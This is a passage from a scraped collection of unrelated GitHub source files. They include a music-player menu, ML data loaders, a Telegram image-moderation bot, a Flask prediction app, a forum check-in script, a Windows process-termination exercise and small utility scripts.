trash_cb(item):\n parent = get_menu_item_top_parent(item)\n trash_songs(parent, songs, librarian)\n\n b.connect(\"activate\", trash_cb)\n b.set_sensitive(is_file and bool(songs))\n self.append(b)\n\n def init_remove(self, in_lib, library, removal_confirmer, remove, songs):\n self._confirm_song_removal = (removal_confirmer or\n confirm_song_removal_invoke)\n b = qltk.MenuItem(_(\"_Remove from Library…\"), Icons.LIST_REMOVE)\n if callable(remove):\n b.connect(\"activate\", lambda item: remove(songs))\n else:\n def remove_cb(item, songs, library):\n parent = get_menu_item_top_parent(item)\n if self._confirm_song_removal(parent, songs):\n library.remove(songs)\n\n b.connect(\"activate\", remove_cb, songs, library)\n b.set_sensitive(in_lib and bool(songs))\n self.append(b)\n\n def init_queue(self, accels, can_add, songs):\n b = qltk.MenuItem(_(\"Add to _Queue\"), Icons.LIST_ADD)\n\n def enqueue_cb(item, songs):\n songs = [s for s in songs if s.can_add]\n if songs:\n from quodlibet import app\n app.window.playlist.enqueue(songs)\n\n b.connect(\"activate\", enqueue_cb, songs)\n if accels:\n qltk.add_fake_accel(b, \"<Primary>Return\")\n self.append(b)\n b.set_sensitive(can_add and bool(songs))\n\n def init_playlists(self, can_add, library, songs):\n try:\n from quodlibet.browsers.playlists.menu import PlaylistMenu\n submenu = PlaylistMenu(songs, library.playlists)\n except AttributeError as e:\n print_w(\"Couldn't get Playlists menu: %s\" % e)\n else:\n b = qltk.MenuItem(_(\"Play_lists\"), Icons.FOLDER_DRAG_ACCEPT)\n b.set_sensitive(can_add and bool(songs))\n b.set_submenu(submenu)\n self.append(b)\n\n def separate(self):\n if not self.get_children():\n return\n elif not isinstance(self.get_children()[-1], Gtk.SeparatorMenuItem):\n self.append(SeparatorMenuItem())\n\n def preseparate(self):\n if not self.get_children():\n return\n elif not isinstance(self.get_children()[0], Gtk.SeparatorMenuItem):\n 
self.prepend(SeparatorMenuItem())\n","repo_name":"quodlibet/quodlibet","sub_path":"quodlibet/qltk/songsmenu.py","file_name":"songsmenu.py","file_ext":"py","file_size_in_byte":18241,"program_lang":"python","lang":"en","doc_type":"code","stars":1306,"dataset":"github-code","pt":"21"} +{"seq_id":"36101739801","text":"from torch.utils.data import DataLoader,Dataset\nfrom utils.get_aug import load_iamge\n\n\nclass ClassificationDataset(Dataset):\n def __init__(self,datadir_path,path,img_width,img_height,load_img,aug):\n self.datadir_path = datadir_path\n self.path = path\n self.img_width = img_width\n self.img_height = img_height\n self.aug = aug\n self.load_img = load_img\n\n # self.img_formats = ['bmp', 'jpg', 'jpeg', 'png']\n fp = open(self.path, 'r')\n images = []\n labels = []\n for line in fp:\n line.strip('\\n')\n line.rstrip()\n information = line.split()\n images.append(self.datadir_path+'/'+information[0])\n labels.append(int(information[1]))\n self.images = images\n self.labels = labels\n\n\n def __getitem__(self, index):\n iamge_path = self.images[index]\n label = self.labels[index]\n image = self.load_img(iamge_path)\n image = image.resize((self.img_width,self.img_height))\n\n if self.aug:\n image = self.aug(image)\n else:\n pass\n return image,label\n\n\n def __len__(self):\n return len(self.images)\n\n\n\nif __name__ == '__main__':\n train_data_dir = 'Oxford_102_Flowers/data/oxford-102-flowers/train.txt'\n val_data_dir = 'Oxford_102_Flowers/data/oxford-102-flowers/valid.txt'\n datadir_path = 'Oxford_102_Flowers/data/oxford-102-flowers'\n train_dataset = ClassificationDataset(datadir_path,train_data_dir,320,320,aug=data_transforms('train'),load_img=load_iamge)\n val_dataset = ClassificationDataset(datadir_path,val_data_dir,320,320,aug=data_transforms('val'),load_img=load_iamge)\n train_loader = DataLoader(train_dataset, batch_size=16, shuffle=True)\n val_loader = DataLoader(val_dataset, batch_size=16, shuffle=False)\n print(train_dataset.__getitem__(0))\n print(val_dataset.__getitem__(0))\n print(train_dataset.__len__())\n print(val_dataset.__len__())","repo_name":"zgzqzzz/classification-models-pytorch","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"31284471659","text":"def user_data(name, surname, birth_year, city, email, phone):\n print('Имя: ', name, 'Фамилия: ', surname, 'Год рождения: ', birth_year,\n 'Город: ', city, 'Почта: ', email, 'Телефон: ', phone)\n\nname = input('Введите имя: ')\nsurname = input('Введите фамилию: ')\nbirth_year = input('Год рождения: ')\ncity = input('Город: ')\nemail = input('Почта: ')\nphone = input('Телефон: ')\n\nuser_data(name, surname, birth_year, city, email, phone)","repo_name":"wellmak7/homework_3","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37044496203","text":"from DRG import *\r\nfrom itertools import combinations\r\nimport numpy as np\r\nimport pandas as pd\r\nimport time\r\n\r\ntiempo0 = time.process_time()\r\n\r\n# Con un fichero con la matriz de reacciones, extraer la lista de reacciones y la lista de EFMs por separado.\r\nnombresReacciones, listaEFMs = FicheroMatriz(\"EFMsEColi.txt\")\r\n# Cálculo de todas las posibles combinaciones de implicaciones (a pares). 
El propio comando filtra las repeticiones en otro orden.\r\ncombinaciones= set(i for i in combinations(nombresReacciones,2))\r\n\r\ntiempo1 = time.process_time()\r\nprint(\"t1:\", tiempo1-tiempo0)\r\n\r\n# PRIMER RECORRIDO: IMPLICACIONES CLARAS EN PROPORCIONES TOTALES\r\n# Set para guardar las implicaciones\r\nimplicacionesPerfectas = set()\r\n\r\n# Calculamos con proporciones: si la proporción es idéntica con todos los decimales, se entiende que podría darse una implicación idéntica. Calculamos la longitud media y desviación de sus EFMs para confirmar.\r\n\r\n# SE CALCULA LA PROPORCIÓN EN LA QUE APARECE CADA REACCIÓN\r\nproporcionesTotal = CalculoProporciones(nombresReacciones, listaEFMs)\r\n\r\ntiempo2 = time.process_time()\r\nprint(\"t2:\",tiempo2-tiempo1)\r\n\r\n# Recorremos cada tupla de combinaciones posibles.\r\nfor i in combinaciones:\r\n # Barrido con las reacciones para asignar su índice en la lista de reacciones para usarlo en \"CalcularLongitud\"\r\n for ind, j in enumerate(nombresReacciones):\r\n if j == i[0]:\r\n i1 = ind\r\n if j == i[1]:\r\n i2 = ind\r\n\r\n # UNA VEZ ESTABLECEMOS EL PAR, SI COINCIDE EL % DE APARICIÓN DE AMBAS REACCIONES...\r\n if proporcionesTotal[i[0]] == proporcionesTotal[i[1]]:\r\n # Calculamos la longitud media y desviación típica para el listado de EFMs que SIEMPRE contienen la reacción concreta.\r\n l1 = CalcularLongitud(EFMsReaccion([i1],listaEFMs)[0])\r\n l2 = CalcularLongitud(EFMsReaccion([i2],listaEFMs)[0])\r\n\r\n # Si coinciden, guardamos la implicación como una perfecta. \r\n if np.mean(l1) == np.mean(l2) and np.std(l1) == np.std(l2):\r\n implicacionesPerfectas.add(i)\r\n\r\ntiempo3 = time.process_time()\r\nprint(\"t3:\",tiempo3-tiempo2)\r\n\r\n# Ahora, combinamos con una función recursiva de modo que todas las implicaciones perfectas se guarden como bloques, en vez de como pares.\r\nbloquesImplicacionesPerfectas = CombinarAcoplamiento(BarridoAcoplamientos(implicacionesPerfectas))\r\n\r\n\r\n\r\n# Escritura de estos resultados en el fichero.\r\nwith open(\"ImplicacionesAcoplamientosNuevo.txt\",\"w\") as fichero:\r\n fichero.write(\"Estos son todos los bloques de implicaciones perfectas encontrados.\")\r\n fichero.write(str(bloquesImplicacionesPerfectas))\r\n\r\ntiempo4 = time.process_time()\r\nprint(\"t4:\",tiempo4-tiempo3)\r\n\r\n# SEGUNDA PARTE: IMPLICACIONES PARCIALES Y NEGATIVAS\r\n\r\n# Primero separamos los pares ya resueltos del resto para ahorrar recursos computacionales en posteriores procedimientos.\r\ncombinaciones2 = []\r\nfor i in combinaciones:\r\n if i not in implicacionesPerfectas:\r\n combinaciones2.append(i)\r\n\r\ntiempo5 = time.process_time()\r\nprint(\"t5:\",tiempo5-tiempo4)\r\n\r\n# Ahora, comenzamos calculando las implicaciones negativas, al ser más fáciles.\r\n# Para cada reacción, calculamos la lista de EFMs que la contienen SIEMPRE, y entonces, la proporción en la que aparecen el resto de reacciones. 
\r\n# Si la proporción es 0, se trata de una implicación negativa (nunca aparecen juntas) y forman parte de su propia lista.\r\n\r\nparesNegativas = []\r\nparesParciales = []\r\n\r\n# Recorriendo el listado de combinaciones...\r\nfor i in combinaciones2:\r\n # Barrido para establecer los índices respectivos en la lista de reacciones y así funcionar con los EFMs.\r\n for ind, j in enumerate(nombresReacciones):\r\n if j == i[0]:\r\n i1 = ind\r\n if j == i[1]:\r\n i2 = ind\r\n\r\n # Calculamos los EFMs en los que aparece la reacción en la posición 1\r\n EFMs1 = EFMsReaccion([i1], listaEFMs)[0]\r\n # La proporción (nº EFMs en los que aparece R2)\r\n # Si la proporción es 0, es un par de implicación negativa.\r\n if ProporcionesDiana(i2, EFMs1) == 0:\r\n paresNegativas.append(i)\r\n # Si el nº de EFMs es total (100%), como la lista excluye acoplamientos perfectos, es un par parcial.\r\n elif ProporcionesDiana(i2, EFMs1) == len(EFMs1):\r\n paresParciales.append(i)\r\n else:\r\n # Si no casa de ninguna otra, manejamos la inversa: calculamos los EFMs en los que aparece R1 frente al listado de EFMs que siempre incluyen R2, para ver si hay un par parcial.\r\n\r\n EFMs2 = EFMsReaccion([i2], listaEFMs)[0]\r\n if ProporcionesDiana(i1, EFMs2) == len(EFMs2):\r\n paresParciales.append(i)\r\n\r\nwith open(\"ImplicacionesAcoplamientosNuevo.txt\",\"a\") as fichero:\r\n fichero.write(\"\\nEstos son todos los pares de implicaciones negativas encontrados.\\n\")\r\n fichero.write(str(paresNegativas))\r\n fichero.write(\"\\n\\n\")\r\n fichero.write(\"\\nEstos son todos los pares de implicaciones parciales encontrados.\\n\")\r\n fichero.write(str(paresParciales))\r\n\r\ntiempo6 = time.process_time()\r\nprint(\"t6:\",tiempo6-tiempo5)","repo_name":"Guillamoto/TFM-tools","sub_path":"calculoAcoplamientosNuevo.py","file_name":"calculoAcoplamientosNuevo.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10303499323","text":"\"\"\"Added device_type_id to devices table\n\nRevision ID: e31f36de8dc0\nRevises: 842769c19c90\nCreate Date: 2020-07-13 13:00:00\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'e31f36de8dc0'\ndown_revision = '842769c19c90'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('devices', sa.Column('device_type_id', sa.Integer(), nullable=True))\n op.create_foreign_key(op.f('fk_devices_device_type_id_device_type'), 'devices', 'device_type', ['device_type_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_constraint(op.f('fk_devices_device_type_id_device_type'), 'devices', type_='foreignkey')\n op.drop_column('devices', 'device_type_id')\n # ### end Alembic commands ###\n","repo_name":"mywork-dragon/dave-energy","sub_path":"migrations/versions/e31f36de8dc0_added_device_type_id_to_devices_table.py","file_name":"e31f36de8dc0_added_device_type_id_to_devices_table.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74206102134","text":"from pyrogram import Client, filters, enums\r\nimport requests\r\nimport sqlite3\r\nimport os\r\n\r\napi_id = os.getenv(\"API_ID\")\r\napi_hash = os.getenv(\"API_HASH\")\r\nbot_token = os.getenv(\"BOT_TOKEN\")\r\napi_url = os.getenv(\"API_URL\")\r\n\r\napp = Client(\"my_bot\", api_id=api_id, api_hash=api_hash, bot_token=bot_token)\r\n\r\nconn = sqlite3.connect('settings.db')\r\nc = conn.cursor()\r\n\r\n# Create the settings table if it doesn't exist\r\nc.execute('''\r\n CREATE TABLE IF NOT EXISTS settings (\r\n chat_id INTEGER PRIMARY KEY,\r\n blur_images BOOLEAN\r\n )\r\n''')\r\nconn.commit()\r\n\r\ndef send_image(file_path, api_url):\r\n with open(file_path, 'rb') as r:\r\n image = r.read()\r\n r.close()\r\n req = requests.post(api_url, image).json()\r\n if req['code'] != 200:\r\n return 'Error:', req['msg']\r\n else:\r\n reqData = req['data']\r\n if 'Hentai' in reqData and reqData['Hentai'] > 30:\r\n return 'pron'\r\n elif 'Porn' in reqData and reqData['Porn'] > 30:\r\n return 'pron'\r\n else:\r\n return None\r\n\r\n@app.on_message(filters.command(\"toggle_spoiler\"))\r\nasync def toggle_spoiler(client, message):\r\n admins = []\r\n async for m in client.get_chat_members(message.chat.id, filter=enums.ChatMembersFilter.ADMINISTRATORS):\r\n admins.append(m.user.id)\r\n \r\n if message.from_user.id not in admins:\r\n return\r\n\r\n c.execute('SELECT blur_images FROM settings WHERE chat_id = ?', (message.chat.id,))\r\n row = c.fetchone()\r\n if row is None:\r\n blur_images = True\r\n c.execute('INSERT INTO settings VALUES (?, ?)', (message.chat.id, blur_images))\r\n else:\r\n blur_images = not row[0]\r\n c.execute('UPDATE settings SET blur_images = ? 
WHERE chat_id = ?', (blur_images, message.chat.id))\r\n conn.commit()\r\n\r\n await message.reply(f\"打码模式, {'开启' if blur_images else '关闭'}.\")\r\n\r\n@app.on_message(filters.photo)\r\nasync def download_photo(client, message):\r\n file_path = await message.download(\"downloads/\")\r\n response = send_image(file_path, api_url)\r\n\r\n if response == \"pron\": \r\n await client.delete_messages(\r\n chat_id=message.chat.id,\r\n message_ids=message.id,\r\n )\r\n \r\n c.execute('SELECT blur_images FROM settings WHERE chat_id = ?', (message.chat.id,))\r\n row = c.fetchone()\r\n blur_images = row[0] if row is not None else False\r\n\r\n try:\r\n if blur_images:\r\n await client.send_photo(\r\n chat_id=message.chat.id,\r\n photo=file_path,\r\n caption=\"内容可能是NSFW\",\r\n has_spoiler=True,\r\n )\r\n except Exception as e:\r\n await message.reply(f\"Error: {e}\")\r\n\r\napp.run()","repo_name":"qi-mooo/telegram_nsfw_check_bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40803542468","text":"from flask import Flask, render_template, request, jsonify\nimport joblib\n\napp = Flask(__name__)\n\n\ndef diabetes_predict(algo, preg, glucose, bp, st, insulin, bmi, dpf, age):\n \"\"\"\n It takes in the name of the algorithm, and the features of the patient, and returns the prediction\n of the model\n \n :param algo: The algorithm to use for prediction\n :param preg: Number of times pregnant\n :param glucose: Plasma glucose concentration a 2 hours in an oral glucose tolerance test\n :param bp: Blood pressure\n :param st: Skin Thickness\n :param insulin: 2-Hour serum insulin (mu U/ml)\n :param bmi: Body mass index\n :param dpf: Diabetes Pedigree Function\n :param age: Age (years)\n :return: The prediction of the model.\n \"\"\"\n data = [[preg, glucose, bp, st, insulin, bmi, dpf, age]]\n print(data)\n if algo == \"knn\":\n model = joblib.load(\"models/knn_diabetes.pkl\")\n prediction = model.predict(data)\n return int(prediction[0])\n elif algo == \"naive\":\n model = joblib.load(\"models/nb_diabetes.pkl\")\n prediction = model.predict(data)\n return int(prediction[0])\n else:\n return \"Please select a valid algorithm\"\n\n\n@app.route('/')\ndef knn():\n \"\"\"\n It renders the home.html file.\n :return: The render_template function is being returned.\n \"\"\"\n return render_template('home.html')\n\n\n@app.route('/predict', methods=['GET', 'POST'])\ndef predict():\n \"\"\"\n It takes the values from the form and passes them to the diabetes_predict function\n :return: a jsonfield dictionary.\n \"\"\"\n if request.method == \"POST\":\n # get body parameters\n algo = request.json['algo']\n preg = int(request.json['preg'])\n glucose = int(request.json['glucose'])\n bp = int(request.json['bp'])\n st = int(request.json['st'])\n insulin = int(request.json['insulin'])\n bmi = float(request.json['bmi'])\n dpf = float(request.json['dpf'])\n age = int(request.json['age'])\n\n try:\n prediction = diabetes_predict(algo, preg, glucose, bp, st, insulin, bmi, dpf, age)\n\n return jsonify({\n \"prediction\": prediction\n })\n except ValueError:\n return jsonify({\n \"error\": \"Please enter valid values\"\n })\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"hiskiapp/diabetes-prediction-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
+{"seq_id":"73888475252","text":"\"\"\"\nschedules represent for meetings j for employee i\nadd a new meeting of length l for all employees when they can all attend\nreturn the earliest start time for the mew meeting\nthe new meeting must end before 24x60\n\nschedules = [[[60,150],[180,240]], [[0,210],[360,420]]]\nlength = 120\nres = 240\n\nschedules = [[[480,510]], [[240,330]], [[375,400]]]\nlength = 180\nres = 0\n\nschedules = [[],[],[]]\nlength = 75\nres = 0\n\nschedules = [[0,1439],[[0,390],[480,510]],[]]\nlength = 90\nres = -1\n\"\"\"\nimport heapq\ndef add_new_meeting_for_all(schedules, length):\n\tres = 0\n\th = []\n\tfor i in range(len(schedules)):\n\t\tif len(schedules[i]) == 0: # no meetings\n\t\t\tcontinue\n\t\telse:\n\t\t\theapq.heappush(h, (schedules[i][0], 0, i))\n\n\twhile h:\n\t\tt, j, i = heapq.heappop(h)\n\t\tif res + length <= t[0]: # next start time\n\t\t\treturn res\n\t\tres = max(res, t[1]) # next end time\n\t\t# push the next meeting\n\t\tif j+1 < len(schedules[i]):\n\t\t\theapq.heappush(h, (schedules[i][j+1], j+1, i))\n\tif res + length <= 1440: # end of last meeting\n\t\treturn res\n\treturn -1\n\n\n\nschedules = [[[60,150],[180,240]], [[0,210],[360,420]]]\nlength = 120\nprint(add_new_meeting_for_all(schedules, length))\n# res = 240\n\nschedules = [[[480,510]], [[240,330]], [[375,400]]]\nlength = 180\nprint(add_new_meeting_for_all(schedules, length))\n# res = 0\n\nschedules = [[],[],[]]\nlength = 75\nprint(add_new_meeting_for_all(schedules, length))\n# res = 0\n\nschedules = [[[0,1439]],[[0,390],[480,510]],[]]\nlength = 90\nprint(add_new_meeting_for_all(schedules, length))\n# res = -1\n\n\n","repo_name":"xiaofanc/leetcode","sub_path":"CodeSignal/20230426/add-new-meeting-for-all-employees.py","file_name":"add-new-meeting-for-all-employees.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72355803892","text":"import pandas as pd\r\nimport os\r\nimport numpy as np\r\nimport json\r\n\r\n###########################################################\r\ndef collectStockName(filepath):\r\n '''\r\n Collect stock symbols with price data in specific dirs.\r\n \r\n Args:\r\n filepath(str): Filepath we want to collect stock tickers.\r\n \r\n Returns:\r\n stock_list(list): List of tickers that have CSV in specific filepath.\r\n '''\r\n stock_list=[]\r\n for root, dirs, files in os.walk(filepath):\r\n if files:\r\n for f in files:\r\n if 'csv' in f:\r\n stock_list.append(f.split('.csv')[0])\r\n return stock_list\r\n\r\n\r\n\r\n###########################################################\r\n\r\ndef check_and_create_dir(path):\r\n isExists=os.path.exists(path)\r\n if not isExists:\r\n os.makedirs(path) \r\n print ('{} is built successfully.'.format(path))\r\n else:\r\n print ('{} exists.'.format(path))\r\n\r\n\r\n#############\r\ndef collectFilenames(filepath, type = 'csv'):\r\n '''\r\n Collect stock symbols with price data in specific dirs.\r\n \r\n Args:\r\n filepath(str): Filepath we want to collect stock tickers.\r\n \r\n Returns:\r\n stock_list(list): List of tickers that have CSV in specific filepath.\r\n '''\r\n files_list=[]\r\n for root, dirs, files in os.walk(filepath):\r\n if files:\r\n for f in files:\r\n if type in f:\r\n files_list.append(f.split('.'+type)[0])\r\n return files_list\r\n\r\n \r\ndef saveContentsAsJson(contents,filepath,filename):\r\n with open(filepath+filename+'.json','w',encoding='utf-8') as json_file:\r\n 
json.dump(contents,json_file,ensure_ascii=False)\r\n \r\ndef loadJson(filepath,filename):\r\n with open(filepath+filename+'.json','r',encoding='utf-8') as json_file:\r\n contents=json.load(json_file)\r\n return contents","repo_name":"zwMargaretProject/BigW","sub_path":"textMining/general_functions.py","file_name":"general_functions.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"36874988542","text":"'''\n功能:mt论坛签到\nDate: 2023/02/21 \ncron: 30 10 * * *\nnew Env('MT论坛每日签到');\n'''\n#青龙环境变量: MTCOOKIE\n#填入完整cookies执行。\n#多账号用@隔开\n\nimport os\nimport re\nimport requests\nfrom notify import send\n\ncookie = os.environ.get(\"MTCOOKIE\") # 从环境变量中获取 Cookie\n\ndef main():\n try:\n headers = {\n \"cookie\": cookie,\n \"Referer\": \"https://bbs.binmt.cc/member.php?mod=logging&action=login&mobile=2\"\n }\n res = requests.get(\"https://bbs.binmt.cc/k_misign-sign.html\", headers=headers)\n formhash = re.search(r\"formhash=(.+?)&\", res.text)\n if formhash and \"登录\" not in res.text:\n signurl = f\"https://bbs.binmt.cc/k_misign-sign.html?operation=qiandao&format=button&formhash={formhash.group(1)}&inajax=1&ajaxtarget=midaben_sign\"\n res2 = requests.get(signurl, headers=headers)\n if \"今日已签\" in res2.text:\n msg = \"今天已经签到过啦\"\n elif \"签到成功\" in res2.text:\n msg1 = re.search(r\"获得随机奖励.+?金币\", res2.text).group()\n msg2 = re.search(r\"已累计签到 \\d+ 天\", res2.text).group()\n msg = f\"签到成功\\n{msg1}\\n{msg2}\"\n else:\n msg = \"签到失败!原因未知\"\n print(res2.text)\n else:\n msg = \"cookie失效\"\n print(msg)\n send(\"【MT论坛】签到通知\", msg + '\\n仓库地址:https://github.com/CoverUp137/jiaoben.git')\n except Exception as e:\n print(e)\n print(\"签到接口请求出错\")\n send(\"【MT论坛】签到通知\", \"签到接口请求出错\" + '\\n仓库地址:https://github.com/CoverUp137/jiaoben.git')\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CoverUp137/jiaoben","sub_path":"mt.py","file_name":"mt.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71722670132","text":"\"\"\"\n Filename: proc_killer.py\n Description: Kills a process when give the window title. All code here written\n by me.\n NOTE-Input works through the PyCharm interpreter, but not when run from\n Powershell or Windows Command Prompt.\n\n Created by: Benjamin M. 
Singleton\n Created: 03-09-2020\n\"\"\"\n\nimport ctypes\n\n\ndef find_window_by_name(target_window_name, user_handle, k_handle):\n \"\"\"\n Finds the handle of a window, given the title of that window.\n :param target_window_name: Title of target window.\n :type target_window_name: ctypes.c_char_p\n :param user_handle: The handle for User32.DLL.\n :type user_handle: ctypes.WinDLL\n :param k_handle: The handle for Kernel32.DLL.\n :type k_handle: ctypes.WinDLL\n :return: Handle of the window.\n :rtype: ctypes.c_void_p\n \"\"\"\n lpClassName = None # optional, and we want flexibility\n lpWindowName = target_window_name\n response = user_handle.FindWindowA(lpClassName, lpWindowName)\n\n error = k_handle.GetLastError()\n\n if error != 0:\n print(\"Encountered error in FindWindowA call\")\n print(\"Error code: {0}\".format(error))\n exit(1)\n\n if response <= 0:\n print(\"The handle was not created\")\n exit(1)\n else:\n print(\"Handle was created: \" + str(response))\n\n return response\n\n\ndef process_id_by_window_handle(hWnd, user_handle, k_handle):\n \"\"\"\n Returns the process ID of the given window.\n :param hWnd: Handle of the desired window.\n :type hWnd: ctypes.c_void_p\n :param user_handle: The handle for User32.DLL.\n :type user_handle: ctypes.WinDLL\n :param k_handle: The handle for Kernel32.DLL.\n :type k_handle: ctypes.WinDLL\n :return: The desired process ID.\n :rtype: ctypes.c_ulong\n \"\"\"\n lpdwProcessId = ctypes.c_ulong() # this is the variable for the Process Id\n response = user_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))\n\n error = k_handle.GetLastError()\n\n if error != 0:\n print(\"Encountered error in GetWindowThreadProcessId call\")\n print(\"Error code: {0}\".format(error))\n exit(1)\n\n print(\"Window thread ID found: \" + str(response))\n print(\"But we're throwing that away because we only want the process ID: \" + str(lpdwProcessId))\n\n return lpdwProcessId\n\n\ndef open_process_by_id(process_id, k_handle):\n \"\"\"\n Creates a handle for accessing the process.\n :param process_id: The process ID of the target process.\n :type process_id: ctypes.c_ulong\n :param k_handle: The handle for Kernel32.DLL.\n :type k_handle: ctypes.WinDLL\n :return: The process handle.\n :rtype: ctypes.c_void_p\n \"\"\"\n dwDesiredAccess = (0x000F0000 | 0x00100000 | 0xFFF) # equivalent of PROCESS_ALL_ACCESS\n bInheritHandle = False # we're not spinning off other processes, so this is irrelevant\n dwProcessId = process_id\n\n process_handle = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)\n\n error = k_handle.GetLastError()\n\n if error != 0:\n print(\"Encountered error in OpenProcess call\")\n print(\"Error code: {0}\".format(error))\n exit(1)\n\n if process_handle <= 0:\n print(\"The handle was not created\")\n exit(1)\n else:\n print(\"Handle was created: \" + str(process_handle))\n\n return process_handle\n\n\ndef kill_process(process_handle, k_handle):\n \"\"\"\n Terminates the specified process.\n :param process_handle: The open handle used to access the process.\n :type process_handle: ctypes.c_void_p\n :param k_handle: The handle for Kernel32.DLL.\n :type k_handle: ctypes.WinDLL\n \"\"\"\n hProcess = process_handle\n uExitCode = 0x1\n\n response = k_handle.TerminateProcess(hProcess, uExitCode)\n\n error = k_handle.GetLastError()\n\n if error != 0:\n print(\"Encountered error in TerminateProcess call\")\n print(\"Error code: {0}\".format(error))\n exit(1)\n\n if response == 0:\n print(\"TerminateProcess failed, yet there was no last 
error? Weird.\")\n exit(1)\n\n print(\"Succesfully killed target process\")\n\n\ndef main():\n # we'll use these handles in every function, they give Python access to these\n # two Windows DLLs\n user_handle = ctypes.WinDLL(\"User32.dll\")\n k_handle = ctypes.WinDLL(\"Kernel32.dll\")\n\n window_name = ctypes.c_char_p(input(\"Please enter the process name: \").encode('utf-8'))\n window_handle = find_window_by_name(window_name, user_handle, k_handle)\n process_id = process_id_by_window_handle(window_handle, user_handle, k_handle)\n process_handle = open_process_by_id(process_id, k_handle)\n kill_process(process_handle, k_handle)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"bsinglet/Windows_API_Python_Course","sub_path":"proc_killer.py","file_name":"proc_killer.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73366436211","text":"import sys\nsys.path.insert(0, \"C:\\\\Users\\\\Marta\\\\source\\\\repos\\\\crunchy-taiyaki\\\\Speckle\\\\src\\\\modules\")\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom initial_parameters import DataFiles\nfrom power_spectrum import Data, remove_background\nfrom plot import define_ylim,slice_image\n\n\n#read config file\nfiles = DataFiles()\nfiles.read_input('C:\\\\Users\\\\Marta\\\\source\\\\repos\\\\crunchy-taiyaki\\\\Speckle\\\\src\\\\inputs\\\\TEST_star_input.txt')\nfiles.info()\n\n#read data from files\ndata = Data()\ndata.read_from(files.data)\n\nimage = data.star_ps.values\nnew_image = remove_background(data.star_ps.values,512)\n\nplt.figure()\nplt.imshow(image,cmap='gray',vmin=np.min(image),vmax=np.max(image)/1e8)\n\nplt.figure()\nplt.imshow(new_image,cmap='gray',vmin=np.min(new_image),vmax=np.max(new_image)/1e8)\n\nplt.figure()\nplt.plot(slice_image(data.star_ps.values,0,0,512,512),label='star ps')\nplt.plot(slice_image(remove_background(data.star_ps.values,512),0,0,512,512),label='rmbg star ps')\nymin,ymax = define_ylim(data.star_ps)\nplt.ylim(ymin,ymax)\nplt.yscale('log')\nplt.legend()\n\nplt.show()","repo_name":"crunchy-taiyaki/Speckle","sub_path":"src/tests/test_rmbg.py","file_name":"test_rmbg.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33642089883","text":"from TelloDrone import DRONE\n\n\ntelloA = DRONE()\n#telloB = DRONE()\ntelloA.set_ip(\"macaddr\")\n#telloB.set_ip(\"macaddr\")\ntelloA.get_ip()\ntelloA.battery_stat()\n# macアドレスを入力\n\ntelloA.fly_test()\n\nimport threading\n\n#2台を並列処理\n#threadA = threading.Thread(target=telloA.fly_test)\n#threadB = threading.Thread(target=telloB.fly_test)\n#threadA.start()\n#threadB.start()\n#threadA.join()\n#threadB.join()\n#print(\"テスト飛行の終了\")\n","repo_name":"codexu2021/Drone_python","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14851541415","text":"##implementation of epsilon greedy algorithm\n\nimport numpy as np\nfrom random import randrange\nfrom multi_arm_bandits import bandits\nimport time \nfrom learning_algorithm.action_value import ActionValue \n\n\nclass epsilonAgent():\n def __init__(self):\n self.actionValue = ActionValue()\n \n def __choose_random(self):\n return np.random.randn()\n \n def __choose_best_arm(self):\n return np.argmax(self.estimate)\n\n def __choose_arm(self, epsilon, bandit, epoch):\n\n p = 
